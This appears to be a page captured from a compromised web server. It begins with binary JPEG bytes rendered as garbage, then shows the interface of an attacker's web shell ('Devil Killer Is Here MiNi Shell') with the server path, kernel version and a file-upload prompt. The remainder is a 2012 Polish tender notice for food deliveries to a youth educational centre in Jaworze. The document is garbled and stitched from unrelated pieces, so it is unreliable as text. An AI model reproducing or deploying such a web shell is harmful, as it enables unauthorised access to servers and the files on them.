JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/257831-N-2012.html

<p class="kh_header"><b>Jaworze: Dostawa wtaz z transportem pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb, mrożonek i jaj</b><br>
<b>Numer ogłoszenia: 257831 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Młodzieżowy Ośrodek Wychowawczy , ul. Pałacowa 1, 43-384 Jaworze, woj. śląskie, tel. 0-33 8172172, faks 0-33 8172172.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.slaskie.pl/mowjaworze</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wtaz z transportem pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb, mrożonek i jaj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dostawa wraz z transportem pieczywa w ilości   określonych poniżej 
Część A - pieczywo
Lp.    Nazwa artykułu	Jedn. miary  	ilość
1      Chleb krojony - 1 kg	szt.	             5500
2       Bułka  pszenna 80 g	szt.	             6400
3       Bułka graham 100g	szt.	             2100
4       Bułka hotdog 80 G	szt.	             3000
5        Rogal 100g	szt.	1400
6  Drożdżówka  z budyniem, marmoladą ,
jabłkiem i serem120g	szt.	               1100

7	Pączek z pudrem	szt.	800
8	Bułka - wek  350 g	szt.	15

9	Paluch drożdżowy pleciony 120 g	szt.	400
10	Bułka tarta	kg	90
11	Drożdże	kg	3
Część B -nabiał i przetwory mleczne 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Mleko 3,2 %  1 litr karton	szt.	3300
2	Masło 200 g  o zawartości 82 % tłuszczu	szt.	3000
3	Margaryna mleczna 250 g	szt.	800
4	Margaryna śniadaniowa 500 g	szt.	200
5	Margaryna Palma  250 g	szt.	200
6	Śmietana 18 % 400 g	szt.	380
7	Jogurt z owocami 150 g	szt.	2000
8	Kefir 200 g	szt.	150
9	Maślanka owocowa 1 l	szt.	350
10	Ser żółty twardy - Salami	kg	200
11	Ser żółty twardy  - Morski	kg	80
12	Twaróg półtłusty krajanka	kg	200
13	Twaróg cukierniczy  1 kg	szt.	20
14	Serek homogenizowany 150 g	szt.	2200
15	Serek do chleba 100 g	szt.	800
16	Serek wiejski lekki 150 g	szt.	300
17	Serek topiony z dodatkami 100 g	szt.	1500
18	Kluski na parze 200opx 6 szt. /klusek	szt.	200



Część C -mięso i przetwory mięsne 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Schab zk	kg	220
2	Łopatka bk	kg	370
3	Karczek bk	kg	50
4	Udka z kurczaka	kg	250
5	Filet z kurczaka	kg	230
6	Mięso wołowe z  grubego na pieczeń, rolady	kg	15
7	Mięso mielone wp.	kg	80
8	Wątroba wieprzowa	kg	30
9	Wątroba drobiowa	kg	40
10	Kiełbasa toruńska	kg	250
11	Kiełbasa zwyczajna	kg	150
12	Pasztetowa wieprzowa	kg	60
13	Pasztet pieczony	kg	30
14	Polędwica drobiowa	kg	50
15	Kiełbasa kminkowa	kg	45
16	Kiełbasa szynkowa wp.	kg	35
17	Kiełbasa cienka z drobiu	kg	50
18	Boczek wędzony bk	kg	60
19	Boczek rolowanyfaszerowany	kg	35
20	Kiełbasa biała	kg	130
21	Parówka śląska cienka	kg	280
22	Kiełbasa mortadela	kg	50
23	Baleron	kg	20
24	Ogonówka	kg	15
25	Szynka wieprzowa gotowana-wędzona	kg	150
26	Mielonka wieprzowa	kg	85
27	Pieczeń rzymska	kg	65
28	Słonina wędzona	kg	65
29	Kabanosy wieprzowe	kg	6
30	Krupniok  - kaszanka	kg	60
31	Porcje rosołowe	kg	385
32	Ogony wieprzowe	kg	15
33	Kiełbasa śląska wieprzowa	kg	160
34	Kiełbasa żywiecka	kg	60
35	Kości wołowe	kg	30
36	Boczek świeży bk	kg	30
37	Kiełbasa parówkowa gruba	kg	50
38	Żeberka wieprzowe	kg	50
39	Salceson drobiowy	kg	20
40 	Słonina świeża	kg	10
Część D  -  Warzywa świeże   
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Burak czerwony	kg	160
2	Cebula 	kg	450
3	Ziemniak	kg	5200
4	Kapusta czerwona 	kg	100
5	Kapusta biała 	kg	380
6	Marchew	kg	230
7	Pietruszka	kg	100
8	Seler	kg	110
9	Pieczarka	kg	100
10	Por	kg	50
11	Czosnek główka	szt.	100
	Warzywa sezonowe 		
1	Ogórek zielony	kg	130
2	Pomidor	kg	180
3	Kalafior	szt.	25
4	Kalarepa	kg	15
5	Pietruszka zielona 0,25 kg	pęcz	80
6	Sałata zielona 	szt.	60
7	Koperek zielony 0,25 kg	pęcz	80
8	Szczypiorek  0,25 kg	pęcz	60
9	Cebulka zielona 0,25 kg	pęcz	65
10	Kapusta pekińska	kg	70
11	Rzodkiewka 0,25 kg	pęcz	100
12	Botwinka	kg	15
13	Papryka świeża	kg	25
14	Cukinia	kg	12
15	Fasola szparagowa	kg	15
	Warzywa kiszone		
1	Kapusta kiszona	kg	250
2	Ogórek  kiszony	kg	180
3	Żurek 0,5 l	szt.	60
	Owoce		
1	Cytryna	kg	60
2	Pomarańcze 	kg	300
3	Mandarynki	kg	90
4	Kiwi 	kg	80
5	Banany 	kg	350
6	Rabarbar	kg	15
7	Truskawka	kg	36
8	Arbuz	kg	60
9	Jabłko	kg	500
10	Śliwki	kg	100
11	Gruszka	kg	60
12	Nektarynka 	kg	20
13	Brzoskwinia	kg	40
14	Czereśnie	kg	20


Część E - Artykuły Spożywcze  
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Cukier op.1 kg	kg	1500
2	Cukier puder	kg	55
3	Cukier waniliowy  32g	szt.	80
4	Kasza jęczmienna op.1kg	kg	70
5	Kasza manna op.1 kg	kg	35
6	Mąka wrocławska op.1 kg	kg	420
7	Mąka krupczatka op.1 kg	kg	60
8	Mąka ziemniaczana op.1 kg	kg	20
9	Ryż op. 1 kg	kg	160
10	Sól	kg	180
11	Płatki czekoladowe  1000g	szt.	40
12	Płatki  miodowe 1000g	Szt.	40
13	Płatki owsiane op.500g	kg	25
14	Makaron gruby 500g świderki Lubella	szt.	420
15	Makaron nitki 250 g Czaniecki	szt.	400
16	Olej 	l	350
17	Liść laurowy    20g	szt.	40
18	Majeranek  15 g	szt.	80
19	Ziele angielskie 15 g	szt.	35
20	Papryka mielona 20 g słodka	szt.	100
21	Papryka ostra mielona 20 g	szt.	10
22	Przyprawa  do zupy typu magii 1 litr	szt.	60
23	Czosnek mielony 20 g	szt.	450
24	Pieprz mielony 20 g	szt.	440
25	Kminek 20 g	szt.	30
26	Oregano 20g	Szt.	50
27	Bazylia 20 g	Szt.	50
28	Tymianek 20 g	Szt.	20
29	Carry 20g	Szt.	30
30	Zioła prowansalskie 20g	Szt.	50
31	Jarzynka typu Kucharek 1 kg	szt.	45
32	Proszek do pieczenia 36g	szt.	35
33	Soda oczyszczona 20 g	szt.	25
34	Kisiel owocowy 79 g	szt.	900
35	Budyń 60 g	szt.	600
36	Cynamon 20 g	szt.	30
37	Galaretka 80 g	szt.	10
38	Musztarda  200g	szt.	400
39	Krem chrzanowy 170g	szt.	170
40	Majonez 900 g	szt.	150
41	Keczup 1000 g	szt.	150
42	Chrzan tarty  180 g	szt.	50
43	Ocet 500 g 10%	szt.	20
44	Herbata 100 g granulowana	szt.	400
45	Kawa zbożowa 500 g	szt.	25
46	Kakao 200 g	szt.	50
47	Dżem owocowy 1 kg	szt.	100
48	Dżem  różne smaki 280g	Szt.	360
49	Dżem  wysoko słodzony 6,5 kg	szt.	3
50	Miód naturalny  400 g	szt.	180
51	Krem czekoladowy orzechowy 360g 	szt.	500
52	Czekolada mleczna 100 g	szt.	450
53	Baton Pawełek różne smaki	szt.	350
54	Przecier pomidorowy 1 kg	szt.	115
55	Sok owocowy 1 l - karton	szt.	300
56	Syrop owocowy 6,5 kg	Szt.	10
57	Szynka drobiowa konserwa 110 g	szt.	500
58	Konserwa turystyczna 130 g	szt.	200
59	Groszek konserwowy 400g	szt.	100
60	Kukurydza konserwowa 400 g	szt.	100
61	Papryka konserwowa 900 g	szt.	120
62	Ogórek konserwowy 900 g	szt.	240
63	Koncentrat buraczany  330 ml - w butelce	szt.	25
64	Fasola  Jaś	kg	50
65	Fasola kolorowa	kg	20
66	Groch łuskany 	kg	25
67	Pasztet drobiowy 160 g	szt.	1800
68	Ananas w puszce 565 g	szt.	2
69	Brzoskwinia w puszce 850 g	szt.	6
70	Rodzynki 200g	szt.	10
71	Wiórki kokosowe 200 g	szt.	4
72	Masa makowa 1 kg	Szt.	2
73	Skórka pomarańczowa 100g	szt.	6
74	Ciastka - wafle różne smaki	Kg	70
75	Napoje gazowane kolorowe 1,5 l	szt.	300
76	Wody mineralne gazowane 1,5 l	szt.	240
Część F - ryby    
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Filet z mintaja mrożony	kg	120
2	Ryba Panga mrożona	kg	50
3	Matyjas solony 1 wiaderko 4 kg	szt.	10
4	Makrela wędzona 	kg	60
5	Konserwa  rybna -filet w oleju - 170 g	szt.	330
6	Konserwa rybna - filet  w pomidorach -170g	szt.	330
7	Konserwa rybna - szproty - 170g	sz.	200
8	Konserwa -paprykarz -330g	szt.	250
9	Konserwa - tuńczyk w oleju - kawałki-170g	szt.	450

Część  G - Mrożonki warzywa, owoce, kluski, hamburgery
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Mieszanka kompotowa	kg	300
2	Mieszanka warzywna zupa	kg	80
3	Kalafior 	kg	50
4	Brokuły	Kg	30
5	Fasola szparagowa 	kg	50
6	Pierogi ruskie z serem	kg	50
7	Pierogi z kapustą i grzybami	kg	80
8	Pierogi z mięsem	kg	50
9	Pierogi z serem	kg	25
10	Pyzy z mięsem	kg	100
11	Kluski śląskie 	kg	150
12	Kluski ze śliwkami	kg	50
13	Hamburgery drobiowe	Kg	180
14	Groszek mrożony	kg	15
15	Warzywa na patelnie	kg	50
16	Truskawka	kg	60
17	Uszka z kapustą i grzybami	kg	15
Część  H - jaja    
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Jaja  Klasa XL	szt.	17000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.15.00-1, 15.51.14.00-7, 15.11.30.00-3, 01.12.10.00-1, 15.83.00.00-5, 15.61.00.00-7, 15.22.22.00-0, 15.33.11.70-9, 01.24.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
       jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
       a W celu potwierdzenia uprawnień Wykonawca musi prowadzić działalność 
           gospodarczą adekwatną do przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Niezbędną wiedzę i doświadczenie 
    osobami zdolnymi do wykonania zamówienia
      a. Wykonali, a w przypadku świadczeń okresowych lub ciągłych również 
          wykonywanych w ciągu ostatnich 3 lat minimum 2 porównywalne dostawy, a
          jeżeli okres działalności jest krótszy, w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenie stosowania przepisów żywnościowych Rozdz. III pkt. 3ujętych w 
załączniku nr 7 do SIWZ oraz systemu HACCP w jednej z następującej  formie 
certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje    
 i   uprawnienia Polskiego  Centrum Akredytacji z siedzibą w Warszawie lub 
           krajowej organizacji   akredytacyjnej dla danego kraju 
      -   zaświadczenie lub inny dokument właściwego organu Państwowej Inspekcji  
          Sanitarnej lub organu Inspekcji Weterynaryjnej o stosowaniu zasad systemu 
          HACCP 
      -  oświadczenie - załącznik nr 7 do niniejszej SIWZ opracowany przez wykonawcę we
własnym zakresie uzależniony od specyfiki prowadzonej działalności.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca nie podlega wykluczeniu z postępowania o udzielenie 
 zamówienia art. 22 ust. 1 oraz art. 24 ust. 1  ustawy. Wykonawca jest 
 zobowiązany do złożenia oświadczenia, iż spełnia warunki określone w art. 22 
  ust. 1 ustawy Prawo zamówień publicznych i nie podlega wykluczeniu z art. 24
  ust. 1  wg wzoru. Należy złożyć druk, będący załącznikiem nr 2, nr 2A do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych  również 
      wykonywanych, w okresie nie dłuższym niż ostatnie 3 lata, a jeżeli okres  prowadzenia  
      działalności jest krótszy - w tym okresie dwóch, odpowiadających swoim  
      rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich 
      wartości, przedmiotu zamówienia, dat wykonania i odbiorców oraz dokumentów 
      potwierdzających, że te dostawy zostały wykonane należycie załącznik nr 5 do SIW</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji 
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert ,
oświadczenie potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem,  podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne 
 lub zaświadczeń, że uzyskał przewidywane prawem zezwolenie, 
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu załącznik nr 6 opracowany przez wykonawcę wewłasnym zakresie,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie zmiany ilości zamawianego przedmiotu zamówienia między poszczególnymi pozycjami przedmiotu zamówienia do wysokości ogólnej wartości przedmiotu zamówienia. Zmiany ilości zamawianego przedmiotu umowy mogą nastąpić w przypadku zmiany zapotrzebowania Zamawiającego w zakresie przedmiotu zamówienia. Do dokonania zmiany wymagane jest zawarcie stosownego aneksu. Ceny jednostkowe wynikające z oferty Wykonawcy mogą ulec zmianie w przypadku zmiany stawki podatku od towarów i usług obowiązującej dla produktów lub wskaźnik roczny wzrostu cen dotyczący przedmiotu zamówienia publikowany przez GUS. W przypadku zmiany stawki podatku VAT, zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
6. W przypadku spadku ceny określonego rodzaju towaru na korzyść Zamawiającego, Dostawca zobowiązuje się dostarczyć towar za niższą cenę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.slaskie.pl/mowjaworze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Młodzieżowy Ośrodek  Wychowawczy w Jaworzu, ul. Pałacowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 10:00, miejsce: Młodzieżowy Ośrodek Wychowawczy w Jaworzu , ul. Pałacowa1, sekretariat Ośrodka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb krojony - 1 kg	szt.	5500
2	Bułka  pszenna 80 g	szt.	6400
3	Bułka graham 100g	szt.	2100
4	Bułka hotdog 80 G	szt.	3000
5	Rogal 100g	szt.	1400
6	Drożdżówka  z budyniem, marmoladą ,
jabłkiem i serem120g	szt.	1100

7	Pączek z pudrem	szt.	800
8	Bułka - wek  350 g	szt.	15

9	Paluch drożdżowy pleciony 120 g	szt.	400
10	Bułka tarta	kg	90
11	Drożdże	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.15.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko 3,2 %  1 litr karton	szt.	3300
2	Masło 200 g  o zawartości 82 % tłuszczu	szt.	3000
3	Margaryna mleczna 250 g	szt.	800
4	Margaryna śniadaniowa 500 g	szt.	200
5	Margaryna Palma  250 g	szt.	200
6	Śmietana 18 % 400 g	szt.	380
7	Jogurt z owocami 150 g	szt.	2000
8	Kefir 200 g	szt.	150
9	Maślanka owocowa 1 l	szt.	350
10	Ser żółty twardy - Salami	kg	200
11	Ser żółty twardy  - Morski	kg	80
12	Twaróg półtłusty krajanka	kg	200
13	Twaróg cukierniczy  1 kg	szt.	20
14	Serek homogenizowany 150 g	szt.	2200
15	Serek do chleba 100 g	szt.	800
16	Serek wiejski lekki 150 g	szt.	300
17	Serek topiony z dodatkami 100 g	szt.	1500
18	Kluski na parze 200opx 6 szt. /klusek	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i przetworów mięsnych.</p>
